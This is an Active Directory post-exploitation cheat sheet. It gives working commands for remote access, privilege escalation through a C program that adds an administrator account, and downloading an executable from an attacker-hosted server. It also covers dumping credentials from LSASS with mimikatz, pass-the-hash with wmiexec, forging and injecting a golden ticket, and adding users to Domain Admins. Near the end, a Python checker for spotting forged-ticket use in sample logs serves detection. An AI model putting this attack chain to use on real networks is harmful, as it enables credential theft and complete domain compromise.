Active Directory Post Exploitation

Access Users Remotely

Xfreerdp

xfreerdp /u:mike /p:P@ssword /d:homeserver.local /v:192.168.56.13 /w:1920 /h:1080 /fonts /smart-sizing

Gathering Info

Cmd

# Get current user's detail
whoami

# View Groups
whoami /groups

# View all users in the domain (without /domain, net user lists local accounts only)
net user /domain

Privilege Escalation

Powershell

View Running Services

Get-CimInstance -ClassName Win32_Service | Select-Object Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}

View Start Mode of Services

Get-CimInstance -ClassName Win32_Service -Filter "Name='<service name>'" | Select-Object StartMode

Check Permissions using ICACLS

icacls "File Name/Path"

C Program

Adduser.c

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
        int i;

        /* Create the local account; system() returns the command's exit status */
        i = system("net user peter P@ssword /add");
        if (i != 0) {
                fprintf(stderr, "net user failed with status %d\n", i);
                return 1;
        }

        /* Put the new account in the local Administrators group */
        i = system("net localgroup administrators peter /add");
        if (i != 0) {
                fprintf(stderr, "net localgroup failed with status %d\n", i);
                return 1;
        }

        return 0;
}

Compile

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Share the Exe

# Attacker Machine
python3 -m http.server

# Victim Machine
iwr -Uri http://10.10.10.10/<file.exe> -OutFile <file.exe>

Stealing Credentials

Mimikatz

# Start mimikatz
.\mimikatz.exe

# Enable the debug privilege, then dump credentials and hashes from LSASS
privilege::debug

sekurlsa::logonpasswords

Impacket

Wmiexec

impacket-wmiexec -hashes :<NT Hash> domain/user@<IP>

# View PowerShell history (PSReadLine stores it per user under AppData\Roaming)
cd C:\Users\jack\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

PsExec

# Accessing the domain controller
.\PSExec64.exe \\dc01 cmd.exe

Forging Golden Tickets

Get krbtgt Hash and Domain SID

.\mimikatz.exe

privilege::debug

# Dump Hashes
lsadump::lsa /patch

Create Golden Ticket

.\mimikatz.exe

kerberos::purge

# Create the ticket (mimikatz writes it to the file named by /ticket)
kerberos::golden /user:<any user> /domain:homeserver.local /sid:<domain sid> /krbtgt:<krbtgt hash> /ticket:homeserver_golden

Using Golden Ticket

Powershell

.\mimikatz.exe

kerberos::ptt homeserver_golden

misc::cmd

PsExec

PsExec.exe \\dc01 cmd.exe

# Add a user to domain
net user mike P@ssword /add /domain

# Add a user to domain group
net group "domain admins" mike /add /domain
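From the detection side, as an added example that is not part of the original cheat sheet: a small Python checker over constructed domain-controller Security events (4768 = TGT issued, 4769 = service ticket requested) that flags the traits a ticket forged as above leaves behind. It assumes a domain that expects AES tickets and a known-account list supplied by the analyst; the event field names are the Windows ones, the sample lines and accounts are made up.

```python
"""Flag 4769 events that look like use of a forged (golden) TGT.

A 4769 is reported when it uses RC4-HMAC (0x17) where the domain expects
AES, names an account that does not exist, or has no preceding 4768 for
the same account and client address (the DC never issued that TGT).
The event lines and the account list below are constructed sample data.
"""
from collections import defaultdict

# Constructed: the only real accounts in homeserver.local for this sample.
KNOWN_ACCOUNTS = {"jack", "mike", "krbtgt", "administrator"}
AES_TYPES = {"0x11", "0x12"}  # AES128 / AES256 ticket encryption types

# Constructed sample events, one per line, in "key=value" form.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=jack IpAddress=192.168.56.20 TicketEncryptionType=0x12
EventID=4769 TargetUserName=jack@HOMESERVER.LOCAL ServiceName=cifs/dc01 IpAddress=192.168.56.20 TicketEncryptionType=0x12
EventID=4769 TargetUserName=ghostadmin@homeserver.local ServiceName=cifs/dc01 IpAddress=192.168.56.13 TicketEncryptionType=0x17
EventID=4769 TargetUserName=mike@HOMESERVER.LOCAL ServiceName=ldap/dc01 IpAddress=192.168.56.13 TicketEncryptionType=0x17
"""

def parse_event(line):
    """Turn one 'key=value key=value' line into a dict."""
    return dict(field.split("=", 1) for field in line.split())

def detect_golden_ticket_use(text, known_accounts=KNOWN_ACCOUNTS):
    """Return (account, client_ip, reasons) for each suspicious 4769."""
    seen_tgt = defaultdict(set)  # account -> client IPs the DC issued a TGT to
    findings = []
    for line in text.splitlines():
        ev = parse_event(line)
        account = ev["TargetUserName"].split("@")[0].lower()
        client = ev["IpAddress"]
        if ev["EventID"] == "4768":
            seen_tgt[account].add(client)
            continue
        if ev["EventID"] != "4769":
            continue
        reasons = []
        if ev["TicketEncryptionType"] not in AES_TYPES:
            reasons.append("rc4-ticket")       # tickets forged from the krbtgt NT hash are RC4
        if account not in known_accounts:
            reasons.append("unknown-account")  # /user:<any user> need not exist
        if client not in seen_tgt[account]:
            reasons.append("no-prior-tgt")     # this DC never issued a TGT to that client
        if reasons:
            findings.append((account, client, reasons))
    return findings
```

In a domain that still permits RC4 tickets the first rule alone is noisy; the account and missing-4768 checks are what separate a forged TGT from a legacy client.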

REFERENCES

  • https://www.mankier.com/1/xfreerdp

  • https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

  • https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service

  • https://www.netwrix.com/how_golden_ticket_attack_works.html

  • https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/forge_ticket.html

  • https://www.youtube.com/watch?v=f8jGhLwCa28&pp=ygUgd2luZG93cyBwZW50ZXN0IGFjdGl2ZSBkaXJlY3Rvcnk%3D

  • https://www.hackingarticles.in/understanding-guide-mimikatz/

  • https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket